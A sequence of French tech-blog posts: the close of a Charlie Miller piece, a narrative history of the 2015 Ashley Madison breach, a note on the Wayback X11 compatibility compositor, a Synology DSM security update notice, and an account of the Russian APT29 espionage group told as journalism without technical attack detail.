Et Charlie a été pionnier dans cette transformation. Il a montré que le hacking n’était pas qu’une affaire de serveurs web et de bases de données SQL. Il a prouvé qu’on pouvait hacker des objets du quotidien (téléphones, voitures…etc) avec des conséquences potentiellement mortelles. Il a aussi forcé des industries entières à repenser leur approche de la sécurité. Avant lui, Apple pensait que l’obscurité était une défense suffisante. Avant lui, l’industrie automobile pensait que le bus CAN était un détail technique interne sans importance.
Il leur a prouvé qu’ils avaient tort. Brutalement.
Bref, la prochaine fois que vous déverrouillez votre iPhone d’un glissement de doigt, que vous montez dans votre voiture connectée, ou que vous installez une mise à jour de sécurité critique, pensez à Charlie Miller.
Et si vous croisez une Jeep Cherokee sur l’autoroute, gardez vos distances, on ne sait jamais… Charlie et Chris ont peut-être gardé quelques exploits dans leur manche, après tout, les meilleurs hackers ne révèlent jamais tous leurs secrets. 😉
Je vais enfin vous raconter dans les moindres détails l’histoire du hack le plus dévastateur de l’ère numérique. Pas en termes techniques, non, non… Mais plutôt en termes humains.
Ashley Madison, le site qui promettait des aventures extraconjugales discrètes avec son slogan “Life is short. Have an affair” (La vie est courte. Ayez une aventure) et dont les 37 millions d’utilisateurs inscrits pensaient que leurs secrets étaient en sécurité derrière leur mot de passe.
Grossière erreur.
Car en juillet 2015, un groupe mystérieux appelé Impact Team a décidé de faire tomber ce château de cartes. Et les conséquences ont été violentes. Des suicides documentés, des divorces par milliers, des carrières pulvérisées, et la révélation que le PDG lui-même, Noel Biderman, celui qui paradait dans les médias comme un mari fidèle, entretenait plusieurs liaisons payantes. Bref, voici l’histoire complète du hack qui a prouvé que sur Internet, il n’y a aucun secret qui tienne.
Ashley Madison - Le site qui a appris au monde entier que la discrétion absolue n’existait pas
L’histoire commence en 2001 avec Darren J. Morgenstern, un entrepreneur franco-canadien qui a l’idée de créer un site de rencontres pour personnes mariées. Le nom “Ashley Madison” combine alors simplement les deux prénoms féminins les plus populaires de l’époque. Le concept est révolutionnaire et controversé : un site assumant complètement l’adultère.
Mais c’est Noel Biderman qui va transformer cette idée en empire. Né le 24 novembre 1971 à Toronto, petit-fils de survivants de l’Holocauste, diplômé d’Osgoode Hall Law School en 1996, Biderman est avocat devenu agent sportif.
En 2007, Morgenstern vend Ashley Madison à Avid Life Media, et Biderman en devient le PDG. C’est là que l’histoire devient vraiment intéressante. Car Biderman, qui gérait les affaires sentimentales compliquées de ses clients athlètes, jonglant entre épouses et maîtresses, comprend parfaitement tout le potentiel du site.
Le concept est révolutionnaire pour l’époque et contrairement aux sites de rencontres classiques, Ashley Madison assume complètement son côté sulfureux. Pas de faux-semblants, pas d’hypocrisie. Vous êtes marié et vous voulez une aventure ? Venez chez nous, on s’occupe de tout. Le site garantit la discrétion absolue (spoiler : c’était du flanc), les profils peuvent être anonymes, les photos floutées, les paiements discrets sur les relevés bancaires.
Noel Biderman : le PDG “fidèle” qui cachait bien son jeu
Biderman transforme alors progressivement ce petit site canadien en empire mondial avec une stratégie marketing ultra-agressive. Des pubs pendant le Super Bowl (qui ont été refusées), des panneaux d’affichage géants, des campagnes provocantes. Biderman lui-même devient le visage du site, paradant dans les médias avec sa femme Amanda, une Sud-Africaine avec un background en marketing.
Et c’est là que ça devient croustillant car Biderman joue le parfait homme d’affaires familial. Marié depuis 2003, père de deux enfants, il répète partout : “Je suis fidèle à ma femme. Ashley Madison, c’est pour les autres, pas pour moi.” Amanda soutient publiquement son mari et son business controversé. Ils forment le couple parfait de l’hypocrisie entrepreneuriale.
Puis le site explose littéralement. En 2015, Ashley Madison revendique 37 millions d’utilisateurs dans 46 pays et le chiffre d’affaires annuel dépasse les 100 millions de dollars, avec des projections à 150 millions pour 2015. ALM possède aussi d’autres sites comme Established Men (pour les sugar daddies) et CougarLife. Mais Ashley Madison reste le fleuron, générant 90% des revenus.
La particularité d’Ashley Madison, c’est surtout son modèle économique. L’inscription est gratuite pour les femmes (histoire d’attirer du monde), payante pour les hommes et ces derniers doivent acheter des “crédits” pour envoyer des messages. Mais surtout, il y a cette fameuse option “Full Delete” à 19 dollars.
Pour ce prix, Ashley Madison promet d’effacer complètement votre profil et toutes vos données. “Removal of site usage history and personally identifiable information from the site”, disaient-ils. Rien que cette arnaque, euh pardon, cette option a rapporté 1,7 million de dollars en 2014.
Et c’est ce mensonge éhonté qui va tout déclencher.
Car en coulisses, la sécurité d’Ashley Madison est une vaste blague. En 2012, Raja Bhatia, le directeur technique fondateur, tire déjà la sonnette d’alarme. Dans un email interne, il prédit une “crise de sécurité éventuelle” qui pourrait “écorcher vive” la compagnie. Prophétique, le mec.
Et en mai 2015, Mark Steele, directeur de la sécurité, enfonce le clou. Dans un email à Biderman, il explique que leur code est “criblée” de vulnérabilités XSS et CSRF, faciles à exploiter pour n’importe quel script kiddie. Il mentionne aussi des failles plus graves comme l’injection SQL qui pourraient causer des fuites de données “beaucoup plus dommageables”. Les mots de passe étaient bien hachés avec bcrypt, mais tellement mal implémentés que 11 millions d’entre eux seront crackés en à peine 10 jours.
Mais Biderman et ALM s’en foutent royalement. La priorité, c’est la croissance et les profits, pas la sécurité. Cette négligence criminelle va leur coûter très, très cher…
Le 12 juillet 2015, les employés d’Avid Life Media arrivent au bureau pour un lundi pas comme les autres avec sur leurs écrans, un message menaçant : La musique “Thunderstruck” d’AC/DC résonne dans les bureaux et le message est signé “Impact Team”. Ce dernier menace de publier toutes les données de la compagnie et des 37 millions de clients si Ashley Madison et Established Men ne ferment pas immédiatement.
Le manifeste d’Impact Team est cinglant : “Avid Life Media a reçu l’ordre de retirer définitivement Ashley Madison et Established Men sous toutes ses formes, sous peine de voir toutes les données clients divulguées, y compris les profils contenant les fantasmes sexuels secrets des clients et les transactions correspondantes par carte de crédit, les noms et adresses réels, ainsi que les documents et e-mails des employés.”
Ils accusent surtout ALM de mentir sur le service “Full Delete”. Selon eux, même après avoir payé 19 dollars, les vraies informations des utilisateurs restent dans les bases de données.
Le 19 juillet, Impact Team publie leur ultimatum sur Pastebin, donnant 30 jours à ALM pour fermer les sites. Brian Krebs, le célèbre journaliste spécialisé en cybersécurité, révèle alors l’affaire le même jour. C’est la panique totale chez ALM.
Le 20 juillet, Ashley Madison publie trois communiqués minimisant l’incident. Ils parlent d’une “tentative par un tiers non autorisée d’accéder à nos systèmes” et annoncent une enquête avec les forces de l’ordre et Cycura et le compte Twitter habituellement hyperactif du site devient aussi muet comme une carpe.
Pour prouver leur sérieux, le 21 juillet, Impact Team publie 2 500 dossiers d’utilisateurs et le 22 juillet, ils révèlent l’identité complète de deux utilisateurs : un homme de Brockton, Massachusetts, et un autre de l’Ontario. Un avertissement clair : on a tout et on n’hésitera pas.
Les théories fusent alors sur l’identité d’Impact Team. La plus crédible : un inside job. Noel Biderman lui-même déclare peu après : “Nous sommes sur le point de confirmer l’identité du coupable… J’ai son profil sous les yeux, avec toutes ses références professionnelles. Il s’agit sans aucun doute d’une personne qui n’était pas employée ici, mais qui a certainement eu accès à nos services techniques.” Un contractuel ? Un ancien employé viré ? Le mystère reste entier.
John McAfee, le fondateur controversé de l’antivirus éponyme, y va également de sa théorie. Selon lui, c’est “la seule employée femme” d’ALM et les dumps MySQL complets indiquent une connaissance intime de l’infrastructure. “Les hackers ont rarement une connaissance approfondie de la stack technique d’une cible.”, affirme-t-il. Une théorie jamais confirmée, vous vous en doutez, mais qui fait jaser.
Screenshot
Le plus troublant c’est qu’Impact Team semblerait être une seule personne et pas un groupe. Le style d’écriture, la nature personnelle de la vendetta, le fait qu’ils n’aient jamais existé avant et disparaissent après… Tout suggère un individu avec une rancune spécifique. En 2023, Brian Krebs révèle même que le principal suspect se serait suicidé en 2014, AVANT que le hack ne soit rendu public. Si c’est vrai, ça veut dire qu’Impact Team a planifié l’attaque, attendu plus d’un an, puis publié les données. Un niveau de patience dingue.
Puis le délai de 30 jours expire. Nous sommes le 18 aout 2015 et Ashley Madison est toujours en ligne. Impact Team passe alors à l’exécution de ses menaces. Il publie un fichier torrent de 9,7 gigaoctets sur le dark web, accessible uniquement via Tor. Le fichier est signé avec une clé PGP pour prouver son authenticité. À l’intérieur : les infos d’environ 37 millions d’utilisateurs.
Et ces données sont dévastatrices. Noms, emails, adresses, préférences sexuelles, fantasmes secrets, messages privés, transactions par carte de crédit. Même les utilisateurs qui avaient payé pour le “Full Delete” sont là. Impact Team avait donc raison : le service était une arnaque totale.
Full Delete - L’option de confidentialité qui n’en était pas une.
Internet s’enflamme et des dizaines de sites se montent, permettant de vérifier si votre email est dans la fuite. Les journalistes fouillent frénétiquement. Des milliers d’adresses .gov et .mil sont découvertes. Politiciens, militaires, religieux, personnalités publiques… Tout le monde y passe.
Le 20 août, Impact Team frappe encore plus fort avec un deuxième dump de 20 gigaoctets. Cette fois, c’est l’intérieur d’ALM qui est exposé : emails internes, code source, et surtout… 300 emails personnels de Noel Biderman.
Les révélations sont explosives puisque Biderman, Monsieur “Je suis super fidèle”, entretenait une liaison de trois ans avec une escort de Toronto nommée Melisa. Rendez-vous payants de juillet 2012 à mai 2015. D’autres femmes aussi. Les emails détaillent tout : les rencontres, les paiements, les mensonges à Amanda.
Un email particulièrement crade montre Biderman investissant dans une idée d’app appelée “What’s Your Wife Worth?” qui permettrait d’attribuer une valeur monétaire aux femmes selon leur attractivité. Même pour le PDG d’un site d’adultère, c’est too much.
L’email envoyé par le hacker d’Ashley Madison
Le 21 août, dans une interview avec Vice, Impact Team lâche alors une bombe sur la sécurité d’ALM : “Personne ne surveillait. Aucune sécurité. Nous avons travaillé dur pour rendre l’attaque totalement indétectable, puis nous sommes entrés et n’avons rien trouvé à contourner. Vous pouviez utiliser un MotDePasse1234 trouvé sur Internet pour vous connecter au VPN et accéder à tous les serveurs.” Hey oui, la sécurité chez Ashley Madison était tellement nulle qu’il n’y avait rien à contourner.
Malheureusement, les conséquences humaines commencent à se faire sentir. Le 24 août, la police de Toronto annonce deux suicides non confirmés liés à la fuite. Des “crimes de haine” sont rapportés. Chantage, harcèlement, violence domestique… Les victimes du hack deviennent victimes dans la vraie vie.
L’histoire la plus tragique est celle de John Gibson, 56 ans, pasteur et professeur au New Orleans Baptist Theological Seminary. Six jours après la publication, sa femme Christi retrouve son corps. Dans sa note de suicide, Gibson parle de sa honte, de sa dépression, de son addiction sexuelle qu’il combattait depuis 25 ans. Il s’excuse auprès de sa famille. D’autres suivront, comme le capitaine de police Michael Gorham de San Antonio.
Sam Rader, YouTubeur chrétien populaire avec sa chaîne “Sam and Nia”, est aussi exposé. Son compte “dirty_little_secret_man” fait surface. D’abord, il nie puis plus tard, dans le documentaire Netflix, il avouera avoir menti. Il cherchait de l’excitation pendant ses gardes de nuit comme infirmier.
Le 28 août 2015, Biderman démissionne. Un communiqué laconique indique que c’est “dans le meilleur intérêt de la compagnie”. Exit le millionnaire hypocrite. Bizarrement, Amanda ne l’a pas quitté et le couple semble toujours marié aujourd’hui. L’amour ou le fric ? Mystère.
Les conséquences légales sont également massives. En juillet 2017, Ruby Corporation (nouveau nom d’ALM) accepte de payer 11,2 millions de dollars pour régler les procès collectifs. La Federal Trade Commission impose également 17,5 millions d’amende, mais n’en collecte que 1,66 million vu les difficultés financières.
Mais le plus dingue c’est quand même qu’Ashley Madison a survécu. Après le hack, tout le monde prédisait sa mort. Hey oui car qui oserait encore s’inscrire ? Pourtant, sous une nouvelle direction, et avec une sécurité renforcée (authentification à deux facteurs, navigation chiffrée, conformité PCI), le site renaît. En 2017, ils revendiquaient même 50 millions d’utilisateurs. Il faut croire que la demande pour l’adultère en ligne n’a pas disparu.
Le site Ashley Madison en 2025
Impact Team disparaît complètement après les fuites. Aucune revendication ultérieure, aucune autre action et malgré les enquêtes du FBI, de la police canadienne, d’Interpol, personne n’est jamais arrêté. L’identité d’Impact Team reste le plus grand mystère non résolu de toute cette histoire.
Et pour la première fois, des millions de personnes réalisent que leur vie numérique secrète peut devenir publique du jour au lendemain. La notion de vie privée en ligne est redéfinie. Les entreprises comprennent également que la sécurité n’est plus optionnelle et les régulateurs durcissent les lois. Le RGPD européen de 2018 cite même explicitement des cas comme Ashley Madison pour justifier des amendes jusqu’à 4% du chiffre d’affaires mondial.
Sans oublier des documentaires Netflix comme “Ashley Madison: Sex, Lies & Scandal” et Hulu “The Ashley Madison Affair” qui remettent régulièrement l’histoire sur le devant de la scène.
Et Noel Biderman dans tout ça ? Et bien il a su rebondir. Depuis 2024, il est PDG d’Avenue Insights à Toronto et conseiller stratégique chez WonderFi. Loin des projecteurs, il parle de ses nouveaux projets “éthiques” et sur LinkedIn, son profil reste très vague sur la période 2007-2015. L’ombre d’Ashley Madison le suivra pour toujours.
Aujourd’hui, quand on tape “Ashley Madison” dans Google, les premiers résultats sont les articles sur le hack, pas le site. C’est devenu LE cas d’école en cybersécurité, éthique numérique, psychologie sociale mais pour les millions de personnes exposées, c’est une blessure qui ne guérira jamais car les données sont toujours là, sur le dark web, prêtes à ressurgir telles une épée de Damoclès éternelle.
Alors la prochaine fois que vous créez un compte quelque part, pensez-y. Ne mettez jamais en ligne ce que vous ne voudriez pas voir en première page des médias car a question n’est pas “si” vos données seront diffusées mais “quand” et par “qui”.
Ça vous dirait de pouvoir faire tourner vos vieux window managers X11 préférés sur du Wayland moderne. Impossible ??? C’est ce que je pensais aussi avant de découvrir Wayback !
Pour ceux qui ne suivent pas trop l’actualité Linux, on est actuellement en pleine transition entre X11 (le vieux système d’affichage qui date de 1987) et Wayland (le nouveau qui est censé tout révolutionner). Le problème c’est que ça fait 35 ans qu’on développe des environnements de bureau pour X11, et avec Wayland, tout ça risquait de partir à la poubelle. Aux chiottes WindowMaker, Enlightenment, FVWM, et tous ces environnements qu’on adorait bidouiller.
Mais voilà qu’Ariadne Conill, une dev d’Alpine Linux, a eu une idée de génie. Au lieu de tout réécrire from scratch (ce qui prendrait des plombes), pourquoi ne pas créer une couche de compatibilité ? Et c’est exactement ce qu’est Wayback : un compositeur Wayland minimaliste qui sert juste à faire tourner Xwayland en mode “rootful”. En gros, ça fait croire à vos vieux environnements X11 qu’ils tournent sur un vrai serveur X, alors qu’en fait c’est du Wayland derrière.
Le truc vraiment smart, c’est que Wayback ne fait QUE le strict minimum. C’est pas un compositeur Wayland complet avec tous les effets 3D et compagnie. Non, c’est juste ce qu’il faut pour que Xwayland puisse faire son boulot. Du coup c’est léger, ça marche bien, et ça permet de garder tous nos vieux environnements de bureau vivants.
Alors attention, on est encore en version 0.1, donc c’est de l’alpha. Y’a pas le multi-écrans qui marche, pas de contrôle DPMS, et le verrouillage de souris ne fonctionne pas (donc oubliez les FPS pour l’instant). Mais franchement, pour un truc qui vient juste de sortir, c’est déjà super impressionnant.
D’ailleurs, le projet a été intégré dans l’écosystème FreeDesktop.org, ce qui est plutôt bon signe pour l’avenir. Ils ont même un canal IRC (#wayback sur Libera.Chat) avec un bridge Matrix si vous préférez. Et niveau packaging, c’est déjà dispo sur Alpine Linux (forcément), Arch AUR, Fedora, et même dans Nix.
Pour l’installer, c’est pas sorcier. Vous clonez le dépôt GitLab, vous compilez avec Meson, et hop. Les dépendances c’est du classique : Wayland, wlroots 0.19, et Xwayland 24.1 minimum. Une fois installé, au lieu de lancer startx, vous faites wayback-session et magie, votre vieil environnement X11 se lance via Wayland.
Ce qui est cool aussi, c’est l’architecture du truc. Ils ont découpé ça en trois composants : wayback-compositor (le compositeur Wayland minimal), Xwayback (qui remplace le binaire Xorg), et wayback-session (qui remplace startx). Du coup c’est super modulaire et ça s’intègre nickel dans un système existant. Bon par contre, faut pas se mentir, c’est pas encore prêt pour monsieur tout le monde. Mais si vous êtes du genre à avoir encore un vieux WindowMaker qui traîne quelque part ou si vous voulez préserver votre config FVWM de 2003 ou un vieux Enlightenment E16, c’est clairement un projet à suivre de près.
Quoiqu’il en soit, ça pourrait vraiment devenir LE moyen de transition entre X11 et Wayland, comme ça au lieu de forcer tout le monde à tout réécrire, on garde la compatibilité et on migre en douceur. Alpine Linux compte d’ailleurs déjà s’en servir pour réduire la maintenance du serveur X.org classique, et je parie que d’autres distros vont suivre.
Voilà, si vous voulez tester, toutes les infos sont sur le site officiel et le code source est sur GitLab.
Synology vient de mettre en ligne une nouvelle version de son logiciel interne pour ses NAS : DSM 7.2.2-72806 Update 4. Le fabricant n’avait pas fourni de mise à jour depuis 5 mois. Cette dernière est assez importante, car elle vient corriger plusieurs failles de sécurité. Nous vous recommandons chaudement de l’appliquer. Regardons de plus près…
Synology DSM 7.2.2 Update 4
L’arrivée de DSM 7.2.2 date de septembre 2024 et cette version avait fait grand bruit. Synology avait pris plusieurs décisions radicales, comme la désactivation des fonctions de transcodage et la suppression de l’application Video Station. Depuis, 3 mises à jour correctives ont été publiées… et puis plus rien pendant 5 mois.
DSM 7.2.2 Update 4 ne propose aucune nouvelle fonctionnalité. Il s’agit uniquement de correctifs, mais ceux-ci sont critiques. Voici ce qu’indique le journal des modifications :
Correction d’une faille de sécurité concernant la bibliothèque SDK (CVE-2025-8024).
Correction de plusieurs failles de sécurité.
Synology indique la correction de la CVE-2025-8024. Or, aucune vulnérabilité n’est répertoriée sous cet identifiant. Serait-ce le CVE-2024-8024 ? Ou la référence d’une faille non dévoilée pour le moment. La seconde ligne du journal des modifications est encore plus évasive.
Malgré ce flou, le constructeur n’a pas pour habitude de publier des mises à jour sans raison valable. Il est donc raisonnable de penser que cette version corrige des vulnérabilités sérieuses.
Comment télécharger et installer DSM 7.2.2 Update 4 ?
Si votre NAS ne vous propose pas automatiquement cette mise à jour, voici comment l’installer manuellement en suivant ces étapes :
Aujourd’hui les amis, je vais vous raconter l’histoire du groupe de hackers le plus patient et le plus sophistiqué au monde. APT29, aussi connu sous les doux noms de Cozy Bear, The Dukes ou maintenant Midnight Blizzard, c’est l’élite absolue du cyber-espionnage russe. Ce sont des espions qui peuvent squatter vos systèmes pendant des années, qui matent vos emails les plus confidentiels, qui observent chacun de vos mouvements numériques, et tout ça dans la plus grande discrétion.
Ces types ont piraté la Maison Blanche, le Pentagone, le Département d’État américain, et j’en passe. Mais en 2014, les services secrets néerlandais ont réussi l’impensable : ils ont piraté ces pirates ! Je vous raconte tout ça !!
Siège du SVR à Moscou, d’où sont orchestrées les opérations d’APT29
L’histoire d’APT29 commence bien avant que le monde ne connaisse leur nom. Les premiers signes de leur activité remontent à 2008, et certains experts pensent même qu’ils opéraient déjà dès 2004. À l’époque, personne ne savait vraiment qui ils étaient. On voyait juste des attaques ultra-sophistiquées contre des gouvernements occidentaux, des think tanks, des organisations internationales.
Ce qui distinguait déjà ces attaques des autres, c’était leur patience légendaire. Là où d’autres groupes de hackers font du “smash and grab”, ils entrent, ils volent, ils sortent, APT29 s’installait pour des mois, voire des années. Ils observaient, ils apprenaient, ils attendaient. C’était de l’espionnage à l’ancienne, mais avec des moyens modernes. Du coup, c’est pas pour rien qu’on les appelle “Cozy Bear”, l’ours douillet qui hiberne tranquillement dans vos systèmes.
Le nom “Cozy Bear” leur a été donné par CrowdStrike, une société de cybersécurité américaine car dans leur système de nomenclature, tous les groupes russes sont des “ours”. Et y’a du monde au zoo : Fancy Bear (APT28, lié au GRU, le renseignement militaire), Venomous Bear, Primitive Bear… Mais Cozy Bear, c’est ceux qui s’installe pépère dans vos systèmes en attendant le bon moment.
Les autres noms liés à ce groupe sont tout aussi évocateurs. “The Dukes” fait référence à leur famille de malwares : MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, GeminiDuke… Chaque “Duke” a sa spécialité, ses capacités uniques. C’est l’équivalent d’une boîte à outils mais pour faire du cyber espionnage ultra-sophistiqué.
Maintenant, parlons technique deux secondes. Le cœur de MiniDuke, découvert en 2013, était écrit entièrement en assembleur ce qui est un choix assez insolite mais qui montre l’excellent niveau des développeurs. Le malware pesait seulement 20KB, pouvait télécharger des modules additionnels selon les besoins et éviter la détection par les antivirus traditionnels. CozyDuke, lui, utilisait des certificats volés pour signer ses composants et se faire passer pour du code légitime.
Mais revenons à cette incroyable histoire néerlandaise. En 2014, les cyber-espions du Joint Sigint Cyber Unit (JSCU), l’unité cyber conjointe des services de renseignement néerlandais (AIVD et MIVD), bossent sur une piste. Cette unité d’élite de 80-100 personnes a pour mission de répérer des activités cheloues et de remonter leurs traces. Ce qu’ils découvrent alors dépasse leurs espérances les plus folles.
Non seulement ils parviennent à infiltrer le réseau utilisé par APT29, mais ils découvrent aussi quelque chose d’extraordinaire : le groupe opère depuis un bâtiment universitaire près de la Place Rouge à Moscou. Et cerise sur le gâteau, y’a des caméras de surveillance partout dans le bâtiment. Les Néerlandais prennent le contrôle de ces caméras, et hop, c’est l’arroseur arrosé !
La Place Rouge à Moscou, tout près du QG secret d’APT29
Pendant au moins un an, voire jusqu’à deux ans et demi selon les sources, c’est l’opération de contre-espionnage du siècle. Les Néerlandais regardent littéralement par-dessus l’épaule des hackers russes. Ils voient qui entre et sort du bureau. Ils identifient des agents du SVR grâce aux images. Ils observent les hackers lancer leurs attaques en temps réel. C’est comme me regarder bosser en live Twitch, mais avec des vrais espions russes !
Et là, ça part en sucette car l’AIVD voit APT29 attaquer le Département d’État américain en novembre 2014. Ils alertent alors immédiatement leurs homologues américains : “Hé les gars, vos systèmes sont en train de se faire défoncer, voici exactement ce que font les Russes.” Les Américains sont sur le cul. C’est du renseignement en temps réel d’une qualité exceptionnelle.
Le Département d’État américain, première cible majeure observée par les Néerlandais
Quand APT29 s’attaque ensuite à la Maison Blanche fin 2014, les Néerlandais sont encore là, à observer. Les Russes accèdent aux notes confidentielles non classifiées du président Obama et à son agenda et les Américains sont tellement reconnaissants de l’aide néerlandaise qu’ils établissent des canaux de communication ultra-sécurisés entre les deux agences. Du jamais vu dans l’histoire du renseignement.
L’attaque contre le Pentagone en août 2015 est un autre exemple de la sophistication d’APT29. Ils utilisent une technique de spear-phishing c’est à dire des emails ciblés qui semblent légitimes. L’email contient un lien vers ce qui semble être un article d’actualité sur les tensions en Ukraine mais quand la victime clique, c’est le début de l’infiltration.
Le Pentagone paralysé pendant deux semaines par APT29
Et le malware utilisé est une merveille d’ingénierie. Il vérifie d’abord si la machine est intéressante. Si c’est juste un PC lambda, il reste dormant par contre, si c’est une machine avec des accès privilégiés, il s’active et commence à explorer le réseau. Il communique alors avec ses serveurs de commande en utilisant des techniques de stéganographie cachant des données dans des images innocentes postées sur des sites web légitimes. Ces mecs sont des artistes !
L’attaque paralyse le système mail non classifié de l’état-major des armées pendant deux semaines. 4000 militaires et civils travaillant pour l’état-major américain sont affectés. C’est très embarrassant pour la première puissance militaire mondiale, mais c’est surtout inquiétant car si APT29 peut faire subir ça au Pentagone, que peuvent-ils faire d’autre ?
Mais c’est l’attaque contre le Democratic National Committee (DNC) en 2015-2016 qui va vraiment faire connaître APT29 au grand public. Ils infiltrent le réseau du DNC dès l’été 2015, presque un an avant l’élection présidentielle et pendant des mois, ils lisent tranquillement les emails, ils téléchargent des documents, ils observent.
Et là, c’est le bordel complet ! APT29 n’est pas seul sur ce coup. APT28 (Fancy Bear), l’autre groupe de hackers russes lié au GRU, débarque sur le réseau du DNC début 2016. Les deux groupes ne semblent pas coordonner leurs actions. C’est même le contraire : ils se marchent sur les pieds, ils utilisent des techniques différentes, ils ont des objectifs différents.
APT29, fidèle à sa réputation, est discret. Ils collectent du renseignement, point barre. APT28, c’est l’inverse. Ils sont bruyants, agressifs. Ce sont eux qui vont leaker les documents du DNC via WikiLeaks et DCLeaks. Deux services de renseignement russes, deux approches complètement différentes. C’est comme si la DGSE et la DGSI se marchaient dessus pendant une opération. Bref, du grand n’importe quoi !
APT28 et APT29, deux façons de procéder bien différentes
Les Néerlandais observent tout ça en temps réel. Ils voient APT29 opérer, ils comprennent que c’est grave. D’ailleurs, leur renseignements servent de base à l’enquête du FBI sur l’ingérence russe dans l’élection de 2016 et sans les Néerlandais, on n’aurait peut-être jamais su à quel point l’opération était sophistiquée.
Malheureusement, l’accès néerlandais à APT29 se tarit entre 2016 et 2017. Des journalistes néerlandais de Volkskrant et Nieuwsuur révèlent l’histoire en janvier 2018, et suggèrent que des déclarations indiscrètes de hauts responsables américains ont grillé l’opération. Les Russes ont compris qu’ils étaient surveillés et ont changé leurs méthodes. L’AIVD était furieux !! Des années de travail ruinées par des grandes gueules !
Le QG de l’AIVD à Zoetermeer, d’où fut menée l’opération contre APT29
Mais APT29 ne disparaît pas pour autant. Au contraire, ils évoluent, ils s’adaptent. En 2018, on les voit utiliser de nouveaux malwares comme WellMess et WellMail. En 2020, pendant la pandémie, ces enfoirés s’attaquent aux centres de recherche travaillant sur les vaccins COVID-19 aux États-Unis, au Royaume-Uni et au Canada. Leur objectif c’est de voler les formules, les données des essais cliniques et les informations sur la chaîne d’approvisionnement.
C’est cynique au possible, mais c’est logique du point de vue du renseignement russe car pourquoi dépenser des milliards en R&D quand on peut simplement voler le travail des autres ? Les pays occidentaux dénoncent, mais APT29 continue puisqu’ils sont protégés par l’État russe et qu’ils sont intouchables.
Les laboratoires de recherche COVID-19, nouvelles cibles d’APT29 en 2020
Et puis arrive l’attaque SolarWinds fin 2020. Là, c’est le chef-d’œuvre absolu d’APT29, leur opération la plus ambitieuse et la plus réussie. L’idée est géniale et diabolique car au lieu d’attaquer directement des milliers de cibles, pourquoi ne pas simplement compromettre un fournisseur que tout le monde utilise ?
Du coup, ils ciblent SolarWinds, dont le logiciel Orion est utilisé pour la gestion de réseau par des milliers d’entreprises et d’agences gouvernementales. Entre septembre 2019 et février 2020, APT29 infiltre alors l’environnement de développement de SolarWinds et y injectent leur malware, SUNBURST (aussi appelé Solorigate), directement dans les mises à jour légitimes du logiciel. Malin l’ourson !!
SolarWinds, la supply chain compromise qui a secoué le monde
Entre mars et juin 2020, environ 18 000 clients SolarWinds téléchargent et installent la mise à jour compromise. Le malware SUNBURST s’active après une période de dormance de 12 à 14 jours, histoire d’éviter la détection par les sandboxes de sécurité et il contacte ses serveurs de commande en imitant parfaitement le trafic légitime de SolarWinds. Il est donc pratiquement invisible.
Mais attendez, APT29 ne s’intéresse pas aux 18 000 victimes. Non non, ils font le tri comme des chefs car environ 1% des infectés seulement sont sélectionnés pour la phase deux de l’opération. Ce sont les cibles de haute valeur telles que des agences gouvernementales américaines, des entreprises technologiques majeures, des think tanks influents…etc. Et pour les autres, SUNBURST reste dormant ou s’autodétruit.
La liste des victimes confirmées est impressionnante. Le Département du Trésor, le Département du Commerce, le Département de l’Énergie (y compris la National Nuclear Security Administration… oui, ceux qui gèrent l’arsenal nucléaire !), le Département de la Justice… Microsoft, Cisco, Intel, Deloitte, et même FireEye, l’entreprise de cybersécurité qui découvrira l’attaque.
C’est l’ironie du sort car c’est justement FireEye qui tire la sonnette d’alarme le 8 décembre 2020. Ils détectent que leurs propres outils de red team (des outils utilisés pour tester la sécurité) ont été volés. En enquêtant, ils découvrent alors SUNBURST. Kevin Mandia, le CEO de FireEye, déclare que c’est l’attaque la plus sophistiquée qu’il ait jamais vue en 25 ans de carrière, et croyez-moi, le mec en a vu des vertes et des pas mûres !
FireEye, la société de cybersécurité qui a découvert l’attaque SolarWinds
Ce qui impressionne les experts, c’est surtout la patience et la sophistication d’APT29 car ils ont passé des mois, peut-être des années, à planifier cette opé;ration. Ils ont étudié l’architecture de SolarWinds, ils ont trouvé le moyen d’insérer leur code sans déclencher d’alarmes, ils ont créé une infrastructure de commande et contrôle qui imite parfaitement le trafic légitime.
Et une fois dans les réseaux des victimes, APT29 ne se précipite pas. Non, ils explorent méthodiquement, ils identifient les systèmes critiques, ils volent les identifiants administrateurs, et ils installent d’autres backdoors comme TEARDROP et RAINDROP pour garder l’accès même si SUNBURST est découvert.
En janvier 2024, Microsoft annonce une nouvelle intrusion ! Cette fois, APT29 a utilisé une technique vieille comme le monde mais toujours efficace : le password spraying. Ils ont testé des mots de passe communs contre des milliers de comptes jusqu’à trouver un compte de test sans authentification multi-facteurs. Une erreur basique qui a coûté très cher !
Microsoft appelle maintenant APT29 “Midnight Blizzard” ou “NOBELIUM”. C’est poétique, je trouve… le blizzard de minuit, c’est l’attaque qui arrive sans un bruit dans l’obscurité et qui paralyse tout. Ce nouveau nom reflète aussi l’évolution du groupe car ils ne sont plus juste “Cozy Bear”, l’ours douillet. Ils sont devenus une force de la nature, imprévisible et dévastatrice.
Mais le pire, c’est ce que Microsoft révèle en mars 2024… APT29 a eu accès à certains de leurs dépôts de code source pendant l’attaque SolarWinds et le code source de Microsoft, c’est les plans de l’Etoile de la Mort ! Avec ça, APT29 peut chercher des vulnérabilités, comprendre comment fonctionnent les systèmes de sécurité, et peut-être même planifier de futures attaques.
Microsoft, victime récurrente et observateur privilégié d’APT29
Les attaques continuent et se diversifient. En octobre 2024, Microsoft détecte une campagne de spear-phishing massive. APT29 envoie des milliers d’emails à des cibles dans plus de 100 organisations. Les emails contiennent des fichiers RDP (Remote Desktop Protocol) qui, une fois ouverts, connectent la machine de la victime à un serveur contrôlé par APT29. C’est super efficace !
Ce qui est nouveau et assez fou, c’est l’utilisation de Microsoft Teams pour le phishing. APT29 se fait passer pour le support technique et contactent les employés directement via Teams. “Bonjour, on a détecté un problème avec votre compte, pouvez-vous confirmer votre mot de passe ?” Simple, mais terriblement efficace quand c’est bien fait.
Bon, parlons un peu de leur arsenal technique, parce que c’est du lourd. HAMMERTOSS, découvert en 2015, est particulièrement créatif puisqu’il utilise Twitter pour recevoir ses commandes ! Les opérateurs d’APT29 créent des comptes Twitter avec des noms générés algorithmiquement (genre “234Bob234” ou “1abMike52b”) et ils postent des tweets qui semblent innocents mais qui contiennent des instructions encodées et des URLs vers des images contenant des commandes cachées par stéganographie.
